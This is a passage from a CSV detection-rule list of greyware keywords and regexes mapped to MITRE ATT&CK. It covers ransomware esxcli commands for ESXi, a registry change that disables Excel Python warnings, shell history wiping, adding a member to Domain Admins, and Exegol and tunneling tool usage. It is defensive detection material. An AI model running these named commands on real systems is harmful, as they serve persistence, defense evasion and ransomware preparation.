add*",".{0,1000}esxcli\ssystem\saccount\sadd.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1098 - T1078 - T1078.003","TA0003 - TA0004","N/A","N/A","Persistence","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*esxcli system account 
remove*",".{0,1000}esxcli\ssystem\saccount\sremove.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*esxcli system account set -i * -s t*",".{0,1000}esxcli\ssystem\saccount\sset\s\-i\s.{0,1000}\s\-s\st.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1098 - T1078 - T1078.003","TA0003 - TA0004","N/A","N/A","Persistence","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*esxcli system auditrecords local disable*",".{0,1000}esxcli\ssystem\sauditrecords\slocal\sdisable.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1542.003 - T1562.001 - T1553.002 - T1542 - T1600","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*esxcli system permission list*",".{0,1000}esxcli\ssystem\spermission\slist.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1069.002 ","TA0007","N/A","N/A","Discovery","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*esxcli system settings encryption set - require-exec-installed-only=F*",".{0,1000}esxcli\ssystem\ssettings\sencryption\sset\s\-\srequire\-exec\-installed\-only\=F.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1542.003 - T1562.001 - T1553.002 - T1542 - T1600","TA0040 - TA0005","N/A","N/A","Defense 
Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*esxcli system settings encryption set - require-secure-boot=F*",".{0,1000}esxcli\ssystem\ssettings\sencryption\sset\s\-\srequire\-secure\-boot\=F.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1542.003 - T1562.001 - T1553.002 - T1542 - T1600","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*esxcli system settings kernel set -s execInstalledOnly -v F*",".{0,1000}esxcli\ssystem\ssettings\skernel\sset\s\-s\sexecInstalledOnly\s\-v\sF.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1542.003 - T1562.001 - T1553.002 - T1542 - T1600","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*esxcli vm process kill *",".{0,1000}esxcli\svm\sprocess\skill\s.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*esxcli vm process list*",".{0,1000}esxcli\svm\sprocess\slist.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1057 - T1082","TA0007","N/A","N/A","Discovery","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*dorgreen1@gmail.com*",".{0,1000}dorgreen1\@gmail\.com.{0,1000}","greyware_tool_keyword","evilrdp","Th evil 
twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","#email","N/A","10","10","281","31","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*info@skelsecprojects.com*",".{0,1000}info\@skelsecprojects\.com.{0,1000}","greyware_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","#email","N/A","10","10","281","31","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*reg add HKCU\software\policies\microsoft\office\16.0\excel\security /v PythonFunctionWarnings /t REG_DWORD /d 0 /f?*",".{0,1000}reg\sadd\sHKCU\\software\\policies\\microsoft\\office\\16\.0\\excel\\security\s\/v\sPythonFunctionWarnings\s\/t\sREG_DWORD\s\/d\s0\s\/f\?.{0,1000}","greyware_tool_keyword","Excel","prevent any warnings or alerts when Python functions are about to be executed. 
Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet","T1112 - T1131 - T1204.002","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml","1","0","N/A","N/A","7","2","113","14","2024-08-16T18:57:21Z","2022-01-11T07:34:37Z" "*Set-ItemProperty *\excel\security*pythonfunctionwarnings*0*",".{0,1000}Set\-ItemProperty\s.{0,1000}\\excel\\security.{0,1000}pythonfunctionwarnings.{0,1000}0.{0,1000}","greyware_tool_keyword","Excel","prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet","T1112 - T1131 - T1204.002","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml","1","0","N/A","N/A","7","2","113","14","2024-08-16T18:57:21Z","2022-01-11T07:34:37Z" "* -f *.dmp windows.cmdline*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.cmdline.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.dlllist --pid *",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.dlllist\s\-\-pid\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.filescan*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.filescan.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.handles --pid *",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.handles\s\-\-pid\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.info*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.info.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.malfind*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.malfind.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.netscan*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.netscan.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.netstat*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.netstat.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.pslist*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.pslist.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.psscan*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.psscan.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.pstree*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.pstree.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.registry.hivelist*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.registry\.hivelist.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.registry.hivescan*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.registry\.hivescan.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.registry.printkey*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.registry\.printkey.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* -f *.dmp windows.registry.printkey*Software\Microsoft\Windows\CurrentVersion*",".{0,1000}\s\-f\s.{0,1000}\.dmp\swindows\.registry\.printkey.{0,1000}Software\\Microsoft\\Windows\\CurrentVersion.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "* http-put-server.py*",".{0,1000}\shttp\-put\-server\.py.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*/http-put-server.py*",".{0,1000}\/http\-put\-server\.py.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*dig axfr * @*",".{0,1000}dig\saxfr\s.{0,1000}\s\@.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*ftp-server -u * -P * -p 2121*",".{0,1000}ftp\-server\s\-u\s.{0,1000}\s\-P\s.{0,1000}\s\-p\s2121.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*nbtscan -r */24*",".{0,1000}nbtscan\s\-r\s.{0,1000}\/24.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*net rpc group addmem 'Domain admins' *",".{0,1000}net\srpc\sgroup\saddmem\s\'Domain\sadmins\'\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*net rpc group members 'Domain admins' -U *",".{0,1000}net\srpc\sgroup\smembers\s\'Domain\sadmins\'\s\-U\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*netdiscover -i * -r */24*",".{0,1000}netdiscover\s\-i\s.{0,1000}\s\-r\s.{0,1000}\/24.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken*",".{0,1000}ngrok\sauthtoken\sAUTHTOKEN\:\:\:https\:\/\/dashboard\.ngrok\.com\/get\-started\/your\-authtoken.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*nmap -Pn -v -sS -F*",".{0,1000}nmap\s\-Pn\s\-v\s\-sS\s\-F.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*pwnedornot.py -d *",".{0,1000}pwnedornot\.py\s\-d\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*scout aws --profile default -f*",".{0,1000}scout\saws\s\-\-profile\sdefault\s\-f.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*scout azure --cli*",".{0,1000}scout\sazure\s\-\-cli.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*screen /dev/ttyACM0 115200*",".{0,1000}screen\s\/dev\/ttyACM0\s115200.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*snmpwalk -c public -v 1 *",".{0,1000}snmpwalk\s\-c\spublic\s\-v\s1\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*snmpwalk -c public -v 2c *",".{0,1000}snmpwalk\s\-c\spublic\s\-v\s2c\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*tailscale up --advertise-routes=*/24*",".{0,1000}tailscale\sup\s\-\-advertise\-routes\=.{0,1000}\/24.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*tailscaled --tun=userspace-networking --socks5-server=*",".{0,1000}tailscaled\s\-\-tun\=userspace\-networking\s\-\-socks5\-server\=.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*volatility2 --profile=*",".{0,1000}volatility2\s\-\-profile\=.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*volatility3 -f *.dmp*",".{0,1000}volatility3\s\-f\s.{0,1000}\.dmp.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*vulny-code-static-analysis --dir *",".{0,1000}vulny\-code\-static\-analysis\s\-\-dir\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z" "*export HISTFILE=/dev/null*",".{0,1000}export\sHISTFILE\=\/dev\/null.{0,1000}","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*export HISTFILESIZE=0*",".{0,1000}export\sHISTFILESIZE\=0.{0,1000}","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense 
Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*export HISTSIZE=0*",".{0,1000}export\sHISTSIZE\=0.{0,1000}","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "* /usr/local/bin/expose*",".{0,1000}\s\/usr\/local\/bin\/expose.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*/expose/database/expose.db*",".{0,1000}\/expose\/database\/expose\.db.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*/expose/raw/master/builds/expose*",".{0,1000}\/expose\/raw\/master\/builds\/expose.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*/src/expose serve *",".{0,1000}\/src\/expose\sserve\s.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" 
"*beyondcode/expose*",".{0,1000}beyondcode\/expose.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*docker build -t expose *",".{0,1000}docker\sbuild\s\-t\sexpose\s.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*docker run expose *",".{0,1000}docker\srun\sexpose\s.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*expose share http://*",".{0,1000}expose\sshare\shttp\:\/\/.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*exposeConfigPath=/src/config/expose.php*",".{0,1000}exposeConfigPath\=\/src\/config\/expose\.php.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - 